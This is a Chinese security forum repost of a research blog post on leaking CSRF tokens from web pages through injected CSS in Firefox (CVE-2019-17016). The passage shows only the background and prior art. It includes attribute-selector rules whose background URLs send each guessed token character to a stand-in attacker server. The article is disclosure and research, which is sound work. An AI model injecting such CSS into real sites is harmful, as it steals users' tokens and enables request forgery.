首页
论坛
专栏
课程

[转帖]CSS data exfiltration in Firefox via a single injection point

2020-2-14 10:51 331

[转帖]CSS data exfiltration in Firefox via a single injection point

2020-2-14 10:51
331

Original link: https://research.securitum.com/css-data-exfiltration-in-firefox-via-single-injection-point/

 

A few months ago I identified a security issue in Firefox known as CVE-2019-17016. During analysis of the issue, I’ve come up with a new technique of CSS data exfiltration in Firefox via a single injection point which I’m going to share in this blog post.

Basics and prior art

For the sake of the examples, we assume that we want to leak CSRF token from <input> element.

<input type="hidden" name="csrftoken" value="SOME_VALUE">

We cannot use scripts (perhaps because of CSP), so we need to settle for style injection. The classic way is to use attribute selectors, for instance:

input[name='csrftoken'][value^='a'] {
  background: url(//ATTACKER-SERVER/leak/a);
}

input[name='csrftoken'][value^='b'] {  
  background: url(//ATTACKER-SERVER/leak/b); 
}

input[name='csrftoken'][value^='z'] {  
  background: url(//ATTACKER-SERVER/leak/z); 
}

If the CSS rule is applied, then the attacker gets an HTTP request, leaking the first character of the token. Then, another stylesheet needs to be prepared that includes the first known character, for instance:

input[name='csrftoken'][value^='aa'] {
  background: url(//ATTACKER-SERVER/leak/aa); 
} 

input[name='csrftoken'][value^='ab'] {  
  background: url(//ATTACKER-SERVER/leak/ab); 
}

input[name='csrftoken'][value^='az'] {  
  background: url(//ATTACKER-SERVER/leak/az); 
}

It was usually assumed that subsequent stylesheets need to be provided via reloading the page that is loaded in an <iframe>.

 

In 2018 Pepe Vila had an amazing concept that we can achieve the same in Chrome with a single injection point by abusing CSS recursive imports. The same trick was rediscovered in 2019 by Nathanial Lattimer (aka @d0nutptr), however with a slight variation. I’ll summarize Lattimer’s approach below because it is closer to what I’ve come up with in Firefox, even though (what’s pretty funny) I wasn’t aware of Lattimer’s research when doing my own one. So one can say that I rediscovered a rediscovery…

2020安全开发者峰会(2020 SDC)议题征集 中国.北京 7月!

最新回复 (1)
mb_xghoecki 2020-2-14 12:46
2
0
感谢分享
游客
登录 | 注册 方可回帖
返回